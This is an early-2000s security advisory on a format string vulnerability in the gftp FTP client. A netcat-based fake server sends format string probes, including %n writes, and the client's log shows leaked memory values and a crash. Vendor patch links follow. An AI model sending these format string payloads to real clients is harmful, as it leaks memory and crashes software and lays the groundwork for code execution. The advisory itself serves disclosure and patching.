COMMAND
gftp
SYSTEMS AFFECTED
gftp prior to 2.0.8pre1
PROBLEM
Richard Johnson found following. While tinkering around with
gftp, he come up with this interesting result..
(root)>gftp ftp://localhost
Segmentation fault
hrmm bet ud like to know what caused that eh
(root)>nc -l -p 21
%s
%i
%p
%x
%d
%d %d %d %d %d %d %d %d %d
%p %p %p %p %p %p %p %p %p
%s%s%s%s%s%%n%s%%n%s%%n%s%%n%s%s
This shows up in the log window and in log file
gFTP 2.0.7b, Copyright (C) 1998-2000 Brian Masney <masneyb@seul.org>. If
you have any questions, comments, or suggestions about this program,
please feel free to email them to me. You can
always find out the latest news about gFTP from my website at
http://gftp.seul.org/
gFTP comes with ABSOLUTELY NO WARRANTY; for details, see the COPYING
file. This is free software, and you are welcome to redistribute it
under certain conditions; for details, see the COPYING file
Looking up localhost
Trying localhost:21
Connected to localhost:21
?eè[^_?ì]Ã?öU?åfì,WVSè
1077122816
0x40339700
40339700
1077122816
1077122816 1075537132 0 134795632 135333096 1075537132 2 135334848
1075462592
0x40339700 0x401b64ec (nil) 0x808d1e8 0x8110bc0 0x401b64ec 0x2 0x81104e8
The last one made it segfault.
SOLUTION
This has been fixed in 2.0.8pre1.
For RedHat:
ftp://updates.redhat.com/6.2/en/os/SRPMS/gftp-2.0.8-1.src.rpm
ftp://updates.redhat.com/6.2/en/os/alpha/gftp-2.0.8-1.alpha.rpm
ftp://updates.redhat.com/6.2/en/os/i386/gftp-2.0.8-1.i386.rpm
ftp://updates.redhat.com/6.2/en/os/sparc/gftp-2.0.8-1.sparc.rpm
ftp://updates.redhat.com/7.0/en/os/SRPMS/gftp-2.0.8-1.src.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/gftp-2.0.8-1.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/i386/gftp-2.0.8-1.i386.rpm
ftp://updates.redhat.com/7.1/en/os/SRPMS/gftp-2.0.8-1.src.rpm
ftp://updates.redhat.com/7.1/en/os/i386/gftp-2.0.8-1.i386.rpm
For Immunix OS:
http://immunix.org/ImmunixOS/6.2/updates/RPMS/gftp-2.0.8-1_StackGuard.i386.rpm
http://immunix.org/ImmunixOS/6.2/updates/SRPMS/gftp-2.0.8-1_StackGuard.src.rpm
http://immunix.org/ImmunixOS/7.0/updates/RPMS/gftp-2.0.8-1_imnx.i386.rpm
http://immunix.org/ImmunixOS/7.0/updates/SRPMS/gftp-2.0.8-1_imnx.src.rpm
For Linux-Mandrake:
Linux-Mandrake 7.1: 7.1/RPMS/gftp-2.0.8-1.2mdk.i586.rpm
7.1/SRPMS/gftp-2.0.8-1.2mdk.src.rpm
Linux-Mandrake 7.2: 7.2/RPMS/gftp-2.0.8-1.1mdk.i586.rpm
7.2/SRPMS/gftp-2.0.8-1.1mdk.src.rpm
Linux-Mandrake 8.0: 8.0/RPMS/gftp-2.0.8-1.1mdk.i586.rpm
8.0/SRPMS/gftp-2.0.8-1.1mdk.src.rpm
Corporate Server 1.0.1: 1.0.1/RPMS/gftp-2.0.8-1.2mdk.i586.rpm
1.0.1/SRPMS/gftp-2.0.8-1.2mdk.src.rpm
For Progeny Linux:
http://archive.progeny.com/progeny/updates/newton/gftp-common_2.0.8-1progeny1_i386.deb \
http://archive.progeny.com/progeny/updates/newton/gftp-gtk_2.0.8-1progeny1_i386.deb \
http://archive.progeny.com/progeny/updates/newton/gftp-text_2.0.8-1progeny1_i386.deb \
http://archive.progeny.com/progeny/updates/newton/gftp_2.0.8-1progeny1_i386.deb
For Debian Linux:
http://security.debian.org/dists/stable/updates/main/source/gftp_2.0.6a-3.1.diff.gz
http://security.debian.org/dists/stable/updates/main/source/gftp_2.0.6a-3.1.dsc
http://security.debian.org/dists/stable/updates/main/source/gftp_2.0.6a.orig.tar.gz
http://security.debian.org/dists/stable/updates/main/binary-alpha/gftp_2.0.6a-3.1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/gftp_2.0.6a-3.1_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/gftp_2.0.6a-3.1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/gftp_2.0.6a-3.1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/gftp_2.0.6a-3.1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/gftp_2.0.6a-3.1_sparc.deb